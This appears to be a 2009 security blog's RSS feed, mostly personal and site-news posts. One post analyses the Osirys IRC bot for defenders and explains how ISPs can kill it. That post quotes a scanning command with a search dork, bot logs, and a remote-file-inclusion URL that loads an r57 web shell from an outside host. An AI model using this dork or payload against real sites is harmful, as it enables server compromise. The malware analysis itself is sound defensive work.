<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Andrew Martin &#187; Uncategorized</title>
	<atom:link href="http://www.martinsecurity.net/category/uncategorized/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.martinsecurity.net</link>
	<description>Viewing InfoSec from the trenches (formerly Real Security)</description>
	<lastBuildDate>Fri, 18 Dec 2009 19:29:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>Webcast today</title>
		<link>http://www.martinsecurity.net/2009/06/24/webcast-today/</link>
		<comments>http://www.martinsecurity.net/2009/06/24/webcast-today/#comments</comments>
		<pubDate>Wed, 24 Jun 2009 14:07:53 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=335</guid>
		<description><![CDATA[Just a quick reminder that the webcast for my paper &#8220;Mobile Device Forensics&#8221; will be taking place at 1pm EDT today. See my previous blog post for more information.]]></description>
			<content:encoded><![CDATA[<p>Just a quick reminder that the webcast for my paper &#8220;Mobile Device Forensics&#8221; will be taking place at 1pm EDT today. <a title="Paper of the Quarter Webcast" href="http://www.martinsecurity.net/2009/06/15/sans-paper-of-the-quarter-webcast/" target="_self">See my previous blog post for more information</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/06/24/webcast-today/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Controlling an RFI bot &#8211; RFI pt3</title>
		<link>http://www.martinsecurity.net/2009/06/04/controlling-an-rfi-bot/</link>
		<comments>http://www.martinsecurity.net/2009/06/04/controlling-an-rfi-bot/#comments</comments>
		<pubDate>Thu, 04 Jun 2009 22:50:17 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[irc bot]]></category>
		<category><![CDATA[r57]]></category>
		<category><![CDATA[rfi]]></category>
		<category><![CDATA[shell]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=278</guid>
		<description><![CDATA[Lets delve a little deeper into the Osirys IRC bot which I initially discussed in part 1. First I will illustrate how the attacker finds and exploits web servers, then I will discuss how ISPs can get involved and remove these bots from their networks. First the attacker issues a command to the bot to [...]]]></description>
			<content:encoded><![CDATA[<p>Lets delve a little deeper into the Osirys IRC bot which I initially discussed in part 1. First I will illustrate how the attacker finds and exploits web servers, then I will discuss how ISPs can get involved and remove these bots from their networks.</p>
<p>First the attacker issues a command to the bot to begin scanning. The scan will search for the dork &#8220;index.php?sayfa=&#8221; which will find hosts that are <a title="acyhost rfi" href="http://www.securityfocus.com/bid/28231/info" target="_blank">vulnerable to this attack</a>.</p>
<p>&lt;[attacker]&gt; !rfi index.php?sayfa= &#8220;index.php?sayfa=&#8221; -p 75</p>
<p>The bot then searches several search engines to find sites that meet the attacker&#8217;s criteria and begins trying to exploit them.</p>
<p>&lt;bot&gt; [*] RFI Scan started -&gt; 75 sites/process<br />
&lt;bot&gt; [+] Bug: index.php?sayfa=<br />
&lt;bot&gt; [+] Dork: &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;ABACHO : 0 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;WEB.DE : 0 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;YAHOO : 0 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;ASK : 126 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;ALLTHEWEB : 3084 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;UOL : 390 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;MSN : 2997 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;ALTAVISTA : 630 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;WEB.DE : 0 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;GOOGLE : 0 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;MSN : 3057 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;ASK : 363 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;UOL : 225 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;VIRGILIO : 0 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;LYCOS : 1731 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [~] &gt;ABACHO : 0 &gt; &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [*] &gt;EXPLOITABLES: 4561 &#8220;index.php?sayfa=&#8221;<br />
&lt;bot&gt; [+] ExPLoItIng STARTED !!</p>
<p>A vulnerable host is found and the attacker is now able to control the host using their shell, which in this case is in r57.txt.</p>
<p>&lt;bot&gt; (safe: ON) (os: WINNT) http://[removed]/EN/index.php?sayfa=http://www.tos-belarus.org/data/r57.txt???<br />
&lt;bot&gt; (uname -a) Windows NT HERA 5.0 build 2195<br />
&lt;bot&gt; (hdd space) free: ( 4.92 Mb) used: ( 84.00 Kb) tot: ( 5.00 Mb)<br />
&lt;bot&gt; [+] Trying to spread ..<br />
&lt;bot&gt; [%] _/ Exploiting 100 / 4561<br />
ISPs can use the following to interact with the bot and remove it from their network. This bot is running on my own IRC server for testing purposes.</p>
<p>Removal of the bot requires administrative credentials which are available in the script. Looking at the below configuration sample user &#8220;andy&#8221; may issue administrative commands to the bot.</p>
<p>my @admins = (&#8220;andy&#8221;);<br />
my $killpwd   = &#8220;adminpass&#8221;; #Password to Kill the Bot</p>
<p>Show bot commands</p>
<p>&lt;andy&gt; !help<br />
&lt;RFI[13]&gt; [!] !response  &gt; Test if the RFI Response is working<br />
&lt;RFI[13]&gt; [*] !chid &lt;new rfi-id&gt;  &gt; Change the RFI-Response<br />
&lt;RFI[13]&gt; [*] !killme  &gt; KILL The Bot<br />
&lt;RFI[13]&gt; [!] !milw0rm rss  &gt; Get the last Milw0rm bugs<br />
&lt;RFI[13]&gt; [!] !new rfi bugs  &gt; Get the last 10 RFI bugs<br />
&lt;RFI[13]&gt; [!] !new lfi bugs  &gt; Get the last 10 LFI bugs<br />
&lt;RFI[13]&gt; [!] !new sql bugs  &gt; Get the last 10 SQL Injection bugs<br />
&lt;RFI[13]&gt; [!] !new rce bugs  &gt; Get the last 10 RCE bugs<br />
&lt;RFI[13]&gt; [!] !cari &lt;bug&gt; &lt;dork&gt; -p &lt;sites/proc&gt;  &gt; Start the RFI Scanner<br />
&lt;RFI[13]&gt; [!] !lfi &lt;bug&gt; &lt;dork&gt;  &gt; Start the LFI Scanner<br />
&lt;RFI[13]&gt; [!] !sql &lt;bug&gt; &lt;dork&gt; -p &lt;sites/proc&gt;  &gt; Start the SQL Injection Scanner<br />
&lt;RFI[13]&gt; [!] !rce &lt;bug&gt; &lt;dork&gt; -p &lt;sites/proc&gt;  &gt; Start the RCE Scanner<br />
&lt;RFI[13]&gt; [!] !mass[rfi/lfi/sql/rce] &lt;bug&gt; &lt;dork&gt; -p &lt;sites/proc&gt;  &gt; Start the Mass Scan<br />
&lt;RFI[13]&gt; [*] !cmd &lt;bashline&gt;  &gt; Gives command on the Bot&#8217;s shell. Ex: (!cmd id) (!cmd uname -a)<br />
&lt;RFI[13]&gt; [*] !sspread -s &lt;RFI_Vuln_site&gt;  &gt; To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=)<br />
&lt;RFI[13]&gt; [*] !admin add/remove &lt;nickname&gt;  &gt; To add/remove a nickname to/from the admin list<br />
&lt;RFI[13]&gt; [*] /msg RFI[13] !Sec ON/OFF -p &lt;pwd&gt;  &gt; To enable or disable Security Mode<br />
&lt;RFI[13]&gt; [*] /msg RFI[13] !Spread ON/OFF -p &lt;pwd&gt;  &gt; To enable or disable Spread Mode<br />
&lt;RFI[13]&gt; [!] !info  &gt; Get infos about the Bot</p>
<p>Gather information</p>
<p>&lt;andy&gt; !info<br />
&lt;RFI[13]&gt; [i] Release : v6 -Private IrcBot<br />
&lt;RFI[13]&gt; [i] Author  : Attacker Nickname<br />
&lt;RFI[13]&gt; [i] Contact : attacker@some.com<br />
&lt;RFI[13]&gt; [i] Uname -a: Linux ubuntu 2.6.28-11-server #42-Ubuntu SMP Fri Apr 17 02:45:36 UTC 2009 x86_64 GNU/Linux<br />
&lt;RFI[13]&gt; [i] Uptime  :  15:11:59 up 6 days, 50 min,  2 users,  load average: 0.05, 0.01, 0.00<br />
&lt;RFI[13]&gt; [i] Spread Mode: OFF<br />
&lt;RFI[13]&gt; [i] Security Mode: OFF</p>
<p>Remove the bot (admin only)</p>
<p>&lt;andy&gt; !cmd rm myscan2.txt (optional step if you know the name of the bot file)<br />
&lt;andy&gt; !killme<br />
&lt;RFI[13]&gt; [!] Bye Bye !<br />
* RFI[13] has quit IRC (Client exited)</p>
<p>Remember that simply removing the bot does not address the underlying vulnerability on the system that allowed it to be compromised.</p>
<p>This script also contains valuable investigative information in these two variables:</p>
<p>$auth = &#8220;attacker nickname&#8221;;<br />
$authmail = &#8220;attacker@some.com&#8221;;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/06/04/controlling-an-rfi-bot/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Trip cut short by the Swine Flu</title>
		<link>http://www.martinsecurity.net/2009/04/29/trip-cut-short-by-the-swine-fluviaje-abreviada-para-la-enfermedad-porcina/</link>
		<comments>http://www.martinsecurity.net/2009/04/29/trip-cut-short-by-the-swine-fluviaje-abreviada-para-la-enfermedad-porcina/#comments</comments>
		<pubDate>Wed, 29 Apr 2009 16:11:46 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=241</guid>
		<description><![CDATA[Well, looks like my 4 month odyssey is coming to an end about a week early due to the Swine Flu. I am currently in Cancun, Mexico and with all the news coming out about flights being canceled and public gathering places being closed, I&#8217;ve decided to take up the offer from my airline to [...]]]></description>
			<content:encoded><![CDATA[<p>Well, looks like my 4 month odyssey is coming to an end about a week early due to the Swine Flu. I am currently in Cancun, Mexico and with all the news coming out about flights being canceled and public gathering places being closed, I&#8217;ve decided to take up the offer from my airline to change my flight home for free.</p>
<p>So far, Cancun does not have any reported cases of Swine Flu, the people here are not overly worried and for the most part things are normal. Last night however I got news that the Mexican government would be closing public places like Chichen Itza and other archaeological sites. Large bars, clubs, etc are also closed. I also watched a press conference held this morning in Mexico city where they said they are raising their alert level to the highest level possible in the hopes of stemming the flow of new cases. While they know the decision is not popular, they feel it is warranted. The heightened alert level is in effect until May 6th.</p>
<p>Considering Chichen Itza was my reason for coming here, there is now no reason for me to stay during this tense time. This will be an eventful end to a long journey!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/04/29/trip-cut-short-by-the-swine-fluviaje-abreviada-para-la-enfermedad-porcina/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Host Move Complete</title>
		<link>http://www.martinsecurity.net/2009/04/24/host-move-completemudanza-completado/</link>
		<comments>http://www.martinsecurity.net/2009/04/24/host-move-completemudanza-completado/#comments</comments>
		<pubDate>Fri, 24 Apr 2009 22:02:52 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=236</guid>
		<description><![CDATA[The move of the blog to the new domain and web host is now complete. Now I&#8217;ll be able to admin every portion of the site and have much more control. I have also placed ads on the site in the hopes of covering some of my hosting costs. The site&#8217;s page rank has suffered [...]]]></description>
			<content:encoded><![CDATA[<p>The move of the blog to the new domain and web host is now complete. Now I&#8217;ll be able to admin every portion of the site and have much more control. I have also placed ads on the site in the hopes of covering some of my hosting costs.</p>
<p>The site&#8217;s page rank has suffered unfortunately since I had to move from wordpress.com. Being a free offering, wordpress.com doesn&#8217;t give you the ability to re-direct to a new domain and maintain the site&#8217;s reputation unfortunately.</p>
<p>I will also be blogging in both English and Spanish so please forgive spelling / grammatical errors in the Spanish version as I am still learning. Please feel free to report any glaring mistakes.</p>
<p>All content from the old blog (RealSecurity) is now hosted here so please update your bookmarks accordingly.</p>
<p>Only two weeks left until I return home from traveling South and Central America and the entries will start flowing again!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/04/24/host-move-completemudanza-completado/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Moving Hosts</title>
		<link>http://www.martinsecurity.net/2009/04/16/moving-hosts/</link>
		<comments>http://www.martinsecurity.net/2009/04/16/moving-hosts/#comments</comments>
		<pubDate>Thu, 16 Apr 2009 19:33:24 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=214</guid>
		<description><![CDATA[I have decided to change my webhosts in order to provide a better experience to my readers and to re-brand the blog under my own name. I started this blog with a wordpress.com account as a trial and I&#8217;ve been very pleasantly surprised by the feedback and interest the blog has received. So to get [...]]]></description>
			<content:encoded><![CDATA[<p>I have decided to change my webhosts in order to provide a better experience to my readers and to re-brand the blog under my own name. I started this blog with a wordpress.com account as a trial and I&#8217;ve been very pleasantly surprised by the feedback and interest the blog has received. So to get more flexibility I&#8217;ve moved to a proper webhost. The blog will be in a bit of a state of flux as I transition from <a href="http://realsecurity.wordpress.com/" target="_blank">http://realsecurity.wordpress.com</a> to here.</p>
<p>Stay tuned.</p>
<p><code><br />
</code></p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/04/16/moving-hosts/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Social Security Awards</title>
		<link>http://www.martinsecurity.net/2009/03/14/social-security-awards/</link>
		<comments>http://www.martinsecurity.net/2009/03/14/social-security-awards/#comments</comments>
		<pubDate>Sat, 14 Mar 2009 11:43:12 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=202</guid>
		<description><![CDATA[Traveling has been keeping me pretty out of the loop, but I happened to stumble on the Social Security Awards contest where the winner will be announced at the RSA conference this year. Needless to say,  I would appreciate your votes in the Best Technical Security Blog area. Vote here:  http://www.socialsecurityawards.com/ I shall resume regular [...]]]></description>
			<content:encoded><![CDATA[<p>Traveling has been keeping me pretty out of the loop, but I happened to stumble on the Social Security Awards contest where the winner will be announced at the RSA conference this year. Needless to say,  I would appreciate your votes in the Best Technical Security Blog area.</p>
<p>Vote here: <a title="SocialSecurityAwards" href="http://www.socialsecurityawards.com/" target="_blank"> http://www.socialsecurityawards.com/</a></p>
<p>I shall resume regular updates in May upon my return!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/03/14/social-security-awards/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Taking some time off</title>
		<link>http://www.martinsecurity.net/2009/01/07/taking-some-time-off/</link>
		<comments>http://www.martinsecurity.net/2009/01/07/taking-some-time-off/#comments</comments>
		<pubDate>Wed, 07 Jan 2009 20:05:47 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=196</guid>
		<description><![CDATA[Since we normally only live once, I&#8217;ve decided to take an extended vacation.  Thankfully my employer has been kind enough to let me take a 4 month leave of absence. I&#8217;ll be using the time to learn Spanish in Buenos Aires and then continue traveling through South and Central America. Maybe I&#8217;ll post some photos [...]]]></description>
			<content:encoded><![CDATA[<p>Since we normally only live once, I&#8217;ve decided to take an extended vacation.  Thankfully my employer has been kind enough to let me take a 4 month leave of absence. I&#8217;ll be using the time to learn Spanish in Buenos Aires and then continue traveling through South and Central America.</p>
<p>Maybe I&#8217;ll post some photos along the way to make all my readers jealous <img src='http://www.martinsecurity.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Happy hunting,</p>
<p>RealSecurity</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/01/07/taking-some-time-off/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Job ads in HTTP headers?!</title>
		<link>http://www.martinsecurity.net/2008/09/04/job-ads-in-http-headers/</link>
		<comments>http://www.martinsecurity.net/2008/09/04/job-ads-in-http-headers/#comments</comments>
		<pubDate>Thu, 04 Sep 2008 03:34:02 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://realsecurity.wordpress.com/?p=112</guid>
		<description><![CDATA[Seems I was running wireshark in the background while writing the past post. Looks like the WordPress folks are recruiting! My post: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: realsecurity.wordpress.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 Accept: */* The reply: HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Sep 2008 01:53:02 GMT Content-Type: [...]]]></description>
			<content:encoded><![CDATA[<p>Seems I was running wireshark in the background while writing the past post. Looks like the WordPress folks are recruiting!</p>
<p>My post:<br />
POST /wp-admin/admin-ajax.php HTTP/1.1<br />
Host: realsecurity.wordpress.com<br />
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1<br />
Accept: */*</p>
<p>The reply:</p>
<p>HTTP/1.1 200 OK<br />
Server: nginx<br />
Date: Thu, 04 Sep 2008 01:53:02 GMT<br />
Content-Type: text/html; charset=utf-8<br />
Connection: close<br />
<strong>X-hacker: If you&#8217;re reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.</strong><br />
Content-Encoding: gzip<br />
Vary: Accept-Encoding</p>
<p>Content-Length: 22</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2008/09/04/job-ads-in-http-headers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

